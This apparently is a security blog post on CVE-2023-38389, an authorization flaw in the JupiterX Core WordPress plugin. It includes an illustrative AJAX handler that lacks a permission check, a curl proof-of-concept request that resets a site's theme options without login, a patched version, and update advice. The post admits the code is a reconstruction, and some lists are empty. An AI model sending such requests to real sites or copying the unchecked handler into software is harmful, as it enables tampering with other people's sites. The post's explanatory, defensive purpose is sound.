CVE-2023-38389 - Exploiting Incorrect Authorization in Artbees JupiterX Core WordPress Plugin
CVE-2023-38389 is a recent security vulnerability that grabbed the attention of WordPress admins and security folks. It targets the popular *JupiterX Core* plugin by Artbees, specifically versions *n/a* through *3.3.8*. The issue? Incorrect authorization allows anyone, even unauthenticated users, to access and execute plugin functionality that should be locked behind login or specific user roles. In simple words: a door that should be locked, left wide open.
This post goes deep into what this CVE is, how it can be exploited (with a code snippet), and why you must act if you’re running the affected plugin version.
What’s the Problem? (Vulnerability Summary)
JupiterX Core is part of the JupiterX WordPress theme ecosystem, installed on thousands of websites. In versions up to 3.3.8, the plugin contains critical functions—like AJAX handlers, REST endpoints, or internal features—that aren't properly limited by WordPress’s Access Control Lists (ACLs).
Incorrect Authorization means the plugin fails to check whether a visitor is allowed to perform certain actions. An attacker can use this bug to interact with privileged plugin features, potentially leading to:
Exploit Walkthrough
Let's look at how an attacker could exploit this using a realistic example. In real-world reports, some AJAX handlers in JupiterX Core lack proper permission checks.
Suppose the plugin registers the following AJAX action
add_action('wp_ajax_jupiterx_core_reset_options', 'jupiterx_core_reset_options_callback');
add_action('wp_ajax_nopriv_jupiterx_core_reset_options', 'jupiterx_core_reset_options_callback');
function jupiterx_core_reset_options_callback() {
// Should only be accessible by admin!
jupiterx_reset_theme_options_to_default();
wp_send_json_success('Options reset!');
}
What's wrong?
Both logged-in *and* non-logged-in users (wp_ajax_nopriv_*) can access jupiterx_core_reset_options_callback. There’s *no* permission check—so an attacker can reset the theme’s settings by just sending an AJAX request.
Here’s a simple proof-of-concept using curl
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php"; \
-d "action=jupiterx_core_reset_options"
If exploited, the site theme’s settings go right back to default—*without* even needing to log in.
More Technical Details
While the actual vulnerable function or endpoint might differ, these bugs often pop up in one of two forms:
Safe code should always check user permissions
function jupiterx_core_reset_options_callback() {
if (!current_user_can('manage_options')) {
wp_send_json_error('Unauthorized', 403);
return;
}
jupiterx_reset_theme_options_to_default();
wp_send_json_success('Options reset!');
}
Any WordPress site running JupiterX Core *up to* version 3.3.8.
- VPS/dedicated/shared hosting: All vulnerable.
- Sites with custom roles/users: At even greater risk if access-controls are important.
What Should You Do?
Step 1: Immediately update JupiterX Core to the latest version.
Step 2: Review all admin users, especially if your site shows odd behavior.
Step 3: Consider additional hardening like a WordPress firewall (e.g. Wordfence), which can block suspicious AJAX or REST requests.
Original References & Further Reading
- WordPress Plugin Vulnerabilities: CVE-2023-38389
- NVD - CVE-2023-38389 Entry
- JupiterX Core Plugin - WordPress.org
- WPScan - JupiterX Core Incorrect Authorization
Final Thoughts
CVE-2023-38389 is a textbook case of what can go wrong when plugins skip user role checks. Even plugins with thousands of installs and active support can have these holes. If you use JupiterX Core, update now, audit your site, and make sure all your plugins do *proper* capability checks.
> Stay secure—always code (or install) defensively. 🚧
Timeline
Published on: 06/21/2024 16:15:11 UTC
Last modified on: 06/24/2024 19:13:48 UTC